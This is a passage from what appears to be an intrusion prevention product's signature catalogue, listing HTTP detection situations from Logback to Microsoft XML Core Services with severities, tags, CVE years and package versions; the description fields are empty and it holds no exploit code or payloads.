Tags: Any Operating System, Any Hardware, Logback, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1418-5242
Vulnerability: Logback-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Loki-Bot-C2-Traffic

About this situation: Loki Bot C2 traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Loki-Bot-C2-Traffic
Description:
Back to top

HTTP_CS-Maarch-LetterBox-Unrestricted-File-Upload

About this situation: An attempt to exploit a Maarch LetterBox Unrestricted File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Maarch LetterBox, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Maarch-LetterBox-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Macontrol-Traffic

About this situation: MaControl traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Macontrol
Description:
Back to top

HTTP_CS-Mailfile-Cgi-File-Disclosure

About this situation: Information disclosure attempt against Oatmeal studios Mailfile.cgi
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oatmeal studio's Mail-File, CVE2000, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Mailfile-Cgi-File-Disclosure
Description:
Back to top

HTTP_CS-Malicious-WebSocket-Traffic

About this situation: Suspicious request activity has been detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1134-5242
Last changed: sgpkg-ips-1134-5242
Description:
Back to top

HTTP_CS-Manageengine-Adselfservice-Plus-Custom-Script-Execution

About this situation: An attempt to exploit a vulnerability in ManageEngine ADSelfService Plus detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Zoho Corporation ManageEngine ADSelfService Plus, CVE2022, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1461-5242
Last changed: sgpkg-ips-1461-5242
Vulnerability: Manageengine-Adselfservice-Plus-Custom-Script-Execution
Description:
Back to top

HTTP_CS-Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine EventLog Analyzer detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine EventLog Analyzer, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal
Description:
Back to top

HTTP_CS-Manjusaka-C2-GET-Request

About this situation: Manjusaka command and control traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1492-5242
Last changed: sgpkg-ips-1492-5242
Vulnerability: Manjusaka-C2-GET-Request
Description:
Back to top

HTTP_CS-Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset

About this situation: An attempt to exploit a vulnerability in Mantis MantisBT detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MantisBT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-912-5242
Last changed: sgpkg-ips-912-5242
Vulnerability: Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset
Description:
Back to top

HTTP_CS-MantisBT-XmlImportExport-PHP-Code-Injection

About this situation: An attempt to exploit a MantisBT XmlImportExport PHP Code Injection vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MantisBT, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: MantisBT-XmlImportExport-PHP-Code-Injection
Description:
Back to top

HTTP_CS-MaraCMS-Arbitrary-PHP-File-Upload

About this situation: An attempt to exploit a vulnerability in MaraCMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, MaraCMS, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: MaraCMS-Arbitrary-PHP-File-Upload
Description:
Back to top

HTTP_CS-Maze-Ransomware-Traffic

About this situation: Maze ransomware traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Maze-Ransomware-Traffic
Description:
Back to top

HTTP_CS-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the HTTP server component of McAfee ePolicy Orchestrator and ProtectionPilot
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, McAfee ProtectionPilot, McAfee ePolicy Orchestrator, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: HTTP-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow
Description:
Back to top

HTTP_CS-McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in McAfee ePolicy Orchestrator was detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow
Description:
Back to top

HTTP_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in McAfee Framework Services used in McAfee ePolicy Orchestrator and other products detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, McAfee ePolicy Orchestrator, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
Description:
Back to top

HTTP_CS-McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution

About this situation: An attempt to exploit a vulnerability in McAfee Web Reporter detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee Web Reporter, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-547-5211
Vulnerability: McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution
Description:
Back to top

HTTP_CS-MediaWiki-Script-Injection

About this situation: Exploit against cross-site scripting vulnerability in MediaWiki
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MediaWiki, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1618-5242
Vulnerability: MediaWiki-Script-Injection
Description:
Back to top

HTTP_CS-Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Micro Focus NetIQ Sentinel detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Micro Focus NetIQ Sentinel, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468

About this situation: An attempt to exploit a vulnerability in Microsoft Configuration Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Configuration Manager, MS2024-10, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468
Description:
Back to top

HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write
Description:
Back to top

HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write-2

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write
Description:
Back to top

HTTP_CS-Microsoft-IIS-IDA-Path-Disclosure

About this situation: An attempt to exploit a Microsoft IIS IDA Path Disclosure vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IIS 4.0, CVE2000, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-1408-5242
Vulnerability: Microsoft-IIS-IDA-Path-Disclosure
Description:
Back to top

HTTP_CS-Microsoft-IIS-Request-Header-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Information Services detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS 7.5, MS2010-09, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-IIS-Request-Header-Buffer-Overflow
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-016

About this situation: Vulnerability in IIS allows Denial of Service
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS 5.0, MS2001, CVE2001, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-IIS-WebDAV-MS01-016-DOS
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-044

About this situation: Vulnerability in IIS allows Denial of Service
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS 5.0, MS2001, CVE2001, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-IIS-WebDAV-MS01-044-DOS
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Search-DOS-MS01-016

About this situation: Vulnerability in IIS allows Denial of Service
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS 5.0, MS2001, CVE2001, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-IIS-WebDAV-MS01-016-Search-DOS
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Source-Code-Disclosure

About this situation: Exploit against source code disclosure vulnerability in Microsoft IIS 5.1
Context: HTTP Client Stream
Severity: 2
Tags: Windows, x86, IIS 5.1, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Microsoft-IIS-WebDAV-Source-Code-Disclosure
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass

About this situation: Vulnerability in IIS allows unauthorized access
Context: HTTP Client Stream
Severity: 10
Tags: Windows, x86, IIS 6.0, MS2009-06, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-221-3038
Vulnerability: HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-2

About this situation: Vulnerability in IIS allows unauthorized access
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS 6.0, MS2009-06, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-867-5242
Vulnerability: HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-3

About this situation: Vulnerability in IIS allows unauthorized access
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS 6.0, MS2009-06, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-247-3038
Vulnerability: HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-4

About this situation: Vulnerability in IIS allows unauthorized access
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS 6.0, MS2009-06, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-5

About this situation: Vulnerability in IIS allows unauthorized access
Context: HTTP Client Stream
Severity: 10
Tags: Windows, x86, IIS 6.0, MS2009-06, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-OMI-Management-Interface-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Azure OMI detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Microsoft Azure Open Management Infrastructure, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: Microsoft-OMI-Management-Interface-Authentication-Bypass
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-05, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection
Description:
Back to top

HTTP_CS-Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2019, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1218-5242
Vulnerability: Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964

About this situation: Detected attempt to exploit a vulnerability in Microsoft Sharepoint
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2010-12, CVE2010, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-01, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection
Description:
Back to top

HTTP_CS-Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Server detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2022, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-09, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2023-05, CVE2023, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1821-5242
Vulnerability: Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Server-Potential-Unsafe-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-05, MS2024-07, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044
Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38024
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-07, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Vulnerability: Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-05, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1726-5242
Last changed: sgpkg-ips-1726-5242
Vulnerability: Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044
Description:
Back to top

HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2024-07, CVE2024, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023
Description:
Back to top

HTTP_CS-Microsoft-SharePoint-Server-Web-Parts-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, CVE2020, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: Microsoft-SharePoint-Server-Web-Parts-RCE
Description:
Back to top

HTTP_CS-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft SQL Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, CVE2020, Windows not specific, Microsoft SQL Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
Description:
Back to top

HTTP_CS-Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE

About this situation: An attempt to exploit a vulnerability in Code Remote - Containers detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, CVE2021, Windows not specific, Microsoft Visual Studio not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE
Description:
Back to top

HTTP_CS-Microsoft-Windows-DLL-Hijack-Vulnerability

About this situation: Detects applications attempting to access DLL files over HTTP, possible DLL hijack attempt
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-11, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-334-4219
Last changed: sgpkg-ips-1620-5242
Vulnerability: Microsoft-Windows-DLL-Hijack-Vulnerability
Microsoft-Office-Insecure-Library-Loading-CVE-2010-3337
Description:
Back to top

HTTP_CS-Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability

About this situation: A Microsoft Windows TCP Stack Zero Window Size vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability
Description:
Back to top

HTTP_CS-Microsoft-Windows-UPnP-Service-Remote-Code-Execution

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft Windows detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows XP SP2, Windows XP 64-bit SP0, Windows XP 64-bit SP2, Any Hardware, MS2007-04, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Microsoft-Windows-UPnP-Service-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service

About this situation: An attempt to exploit vulnerability in Microsoft Windows detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Any Hardware, MS2013-11, CVE2013, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service
Description:
Back to top

HTTP_CS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure

About this situation: Attempt to exploit a vulnerability in Microsoft XML Core Services detected
